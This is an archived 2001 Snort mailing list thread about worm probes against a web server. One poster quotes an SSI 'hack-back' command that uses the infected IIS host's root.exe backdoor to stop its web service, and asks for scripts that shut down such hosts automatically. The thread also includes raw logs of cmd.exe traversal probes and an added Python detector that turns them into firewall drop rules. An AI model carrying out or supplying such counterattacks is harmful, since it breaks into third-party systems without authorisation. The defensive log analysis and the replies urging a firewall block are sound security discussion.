Snort mailing list archives
RE: Shut them down, I have had enough...
From: "John Berkers" <berjo () ozemail com au>
Date: Wed, 19 Sep 2001 21:58:47 +1000
If you drop the traffic at your router or firewall, the SYN packets are the only thing chewing bandwidth. That might be enough to get some bandwidth back for your own use. Fortunately for us, our ISP is still blocking HTTP for our class B; we only have a couple of different class C's with web servers that are publicly accessible.

Regards,
John

-----Original Message-----
From: snort-users-admin () lists sourceforge net [mailto:snort-users-admin () lists sourceforge net] On Behalf Of Franki
Sent: Wednesday, 19 September 2001 20:38
To: snort-users () lists sourceforge net
Subject: RE: [Snort-users] Shut them down, I have had enough...

If I could drop the packets at the ISP end, then that'd be great, but I can't; they don't offer that... Unfortunately, my ISP just emailed me to tell me that they are infected as well... Whether I drop them or not at my end, they still chew bandwidth... (I am getting about 100 or more attempts a minute, and it would be more except my bandwidth is low.)

Also, I think I could defend myself against them: we have good lawyers, and besides, we were responding to an attack from them; we didn't go looking, and we object to being attacked by their server... If someone comes to your house with a gun and tries to shoot you, and you shoot them instead, that's a case for self-defence... Emailing them doesn't work... been there, done that... If they don't learn, how can we stop them??? The net is so slow over here at the moment, and it's mostly caused by shitloads of Windows boxes...

rgds
Frank

-----Original Message-----
From: Klimarchuk John [mailto:JKLIMARCHUK () TyComLtd com]
Sent: Wednesday, 19 September 2001 6:30 PM
To: 'franki () gshop com au'; snort-users () lists sourceforge net
Subject: RE: [Snort-users] Shut them down, I have had enough...

Why don't you just set your firewall to drop all packets coming from that or those IP addresses?

Remember, if you send a DDoS to that or those servers, you are just as guilty as those administrators of not doing due diligence. Depending on the damage and downtime associated with your proposed DDoS, YOU can be held liable. I don't think your company would like that too much!

-----Original Message-----
From: Franki [mailto:franki () gshop com au]
Sent: Wednesday, September 19, 2001 3:03 AM
To: snort-users () lists sourceforge net
Subject: [Snort-users] Shut them down, I have had enough...

Hi all,

I have seen in the past a PHP script that would shut down infected IIS servers that are trying to infect Linux boxes. I haven't done it, because I didn't really think it was that nice a thing to do... This is the one I saw:

1) Create a file called default.ida, and in there add this:
<!--#exec cmd="lynx -source http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->
(On one line, if it wraps in your mail client.)

2) Then in your httpd.conf or similar, add this:
AddType text/html .ida
AddHandler server-parsed .ida

But I checked my personal server this morning and the httpd error log looks like this (see the end of the email). Anyway, I'd like to set up the server to shut down any IIS box that asks for cmd.exe or root.exe. Does anyone know how this can be done using either Perl or PHP??? Has anyone already done it? If so, where can I find it??? I am tired of this; I have very limited bandwidth, and even if it isn't doing any damage, it's chewing up the bandwidth and costing me money. As far as I am now concerned, they have three choices: either patch their server, pay my bandwidth bill, or get their servers shut down a lot... Any help would be much appreciated.

Regards
Frank
Perth WA

[Wed Sep 19 14:47:27 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Wed Sep 19 14:47:28 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/d/winnt/system32/cmd.exe
[Wed Sep 19 14:47:31 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:47:33 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:47:34 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:47:40 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../winnt/system32/cmd.exe
[Wed Sep 19 14:47:42 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe
[Wed Sep 19 14:48:00 2001] [error] [client 203.47.134.211] File does not exist: /var/www/html/otherwebs/epay/default.ida
[Wed Sep 19 14:48:13 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/root.exe
[Wed Sep 19 14:48:14 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/MSADC/root.exe
[Wed Sep 19 14:48:15 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Wed Sep 19 14:48:16 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/d/winnt/system32/cmd.exe
[Wed Sep 19 14:48:18 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:19 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:21 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:23 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../winnt/system32/cmd.exe
[Wed Sep 19 14:48:24 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe
[root@mail httpd]# tail -50 error_log
[Wed Sep 19 14:53:18 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:18 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:19 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/otherwebs/ezetax/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:21 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A?../winnt/system32/cmd.exe
[Wed Sep 19 14:53:21 2001] [error] [client 203.176.30.78] File does not exist: /var/www/html/otherwebs/ezetax/scripts/..%2f../winnt/system32/cmd.exe
[Wed Sep 19 14:53:22 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
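The error_log excerpt at the end of the thread is what a defender actually has to work with, and the two replies agree on the mitigation: drop the offending sources at the router or firewall rather than reach back at them. The following is an added example, not code from the list or from any of the posters. It parses lines in that Apache error_log format, tags each request path against the probe signatures visible in the log (cmd.exe, root.exe, default.ida, and the ..%5c.. / ..%2f.. traversal encodings), counts probes per client address, and renders per-source firewall drop rules for the addresses that cross a threshold. The sample log is constructed from lines quoted in the message plus one made-up benign 404 (192.0.2.10) and the pasted shell prompt, which the parser has to skip; the rule renderer assumes a Linux host using iptables as the firewall.

```python
import re
from collections import Counter

# Constructed sample in the Apache error_log format quoted in the thread. The
# 203.x client addresses are the ones that appear in the original message; the
# 192.0.2.10 line is a made-up benign request, and the prompt line stands in
# for the "tail -50 error_log" prompt that was pasted into the mail.
SAMPLE_LOG = """\
[Wed Sep 19 14:47:27 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Wed Sep 19 14:47:31 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:00 2001] [error] [client 203.47.134.211] File does not exist: /var/www/html/otherwebs/epay/default.ida
[Wed Sep 19 14:48:13 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/MSADC/root.exe
[root@mail httpd]# tail -50 error_log
[Wed Sep 19 14:53:21 2001] [error] [client 203.176.30.78] File does not exist: /var/www/html/otherwebs/ezetax/scripts/..%2f../winnt/system32/cmd.exe
[Wed Sep 19 14:55:02 2001] [error] [client 192.0.2.10] File does not exist: /var/www/html/favicon.ico
"""

# One "File does not exist" error_log line: timestamp, client address, path.
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>\d{1,3}(?:\.\d{1,3}){3})\] "
    r"File does not exist: (?P<path>\S+)$"
)

# (tag, regex) pairs applied to the lower-cased request path. These are the
# probe patterns visible in the quoted log, nothing beyond them.
SIGNATURES = [
    ("cmd.exe", re.compile(r"/winnt/system32/cmd\.exe$")),
    ("root.exe", re.compile(r"/root\.exe$")),
    ("default.ida", re.compile(r"/default\.ida$")),
    ("traversal", re.compile(r"\.\.(?:%5c|%2f)\.\.")),
]


def parse_line(line):
    """Return {'ts', 'ip', 'path'} for an error_log 404 line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(path):
    """Return the signature tags the request path matches (empty list for a benign 404)."""
    p = path.lower()
    return [tag for tag, rx in SIGNATURES if rx.search(p)]


def probe_counts(log_text):
    """Count probe lines per client address; unparseable and benign lines are skipped."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and classify(rec["path"]):
            counts[rec["ip"]] += 1
    return counts


def drop_candidates(log_text, threshold=3):
    """(ip, count) for clients with at least `threshold` probes, busiest first."""
    counts = probe_counts(log_text)
    hits = [(ip, n) for ip, n in counts.items() if n >= threshold]
    return sorted(hits, key=lambda t: (-t[1], t[0]))


def iptables_drop_rules(candidates, port=80):
    """Render one iptables DROP rule per candidate source address (assumes a
    Linux host running iptables as the firewall the thread talks about)."""
    return [
        f"iptables -A INPUT -s {ip} -p tcp --dport {port} -j DROP"
        for ip, _ in candidates
    ]


if __name__ == "__main__":
    for ip, n in drop_candidates(SAMPLE_LOG, threshold=1):
        print(f"{ip:16} {n} probe(s)")
    for rule in iptables_drop_rules(drop_candidates(SAMPLE_LOG)):
        print(rule)
```

Thresholding on the probe count keeps a single odd 404 from being treated as a worm, and the rules are scoped to the source address and port 80 only, so unrelated traffic from the same network is untouched. Running this over the full log rather than the sample would also catch the 203.47.1.130 host that appears further down the excerpt.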
Current thread:
- Shut them down, I have had enough... Xno Xutz (Sep 19)
- <Possible follow-ups>
- RE: Shut them down, I have had enough... Klimarchuk John (Sep 19)
- RE: Shut them down, I have had enough... Franki (Sep 19)
- RE: Shut them down, I have had enough... John Berkers (Sep 19)
- Re: Shut them down, I have had enough... Jason Costomiris (Sep 19)
- RE: Shut them down, I have had enough... Franki (Sep 19)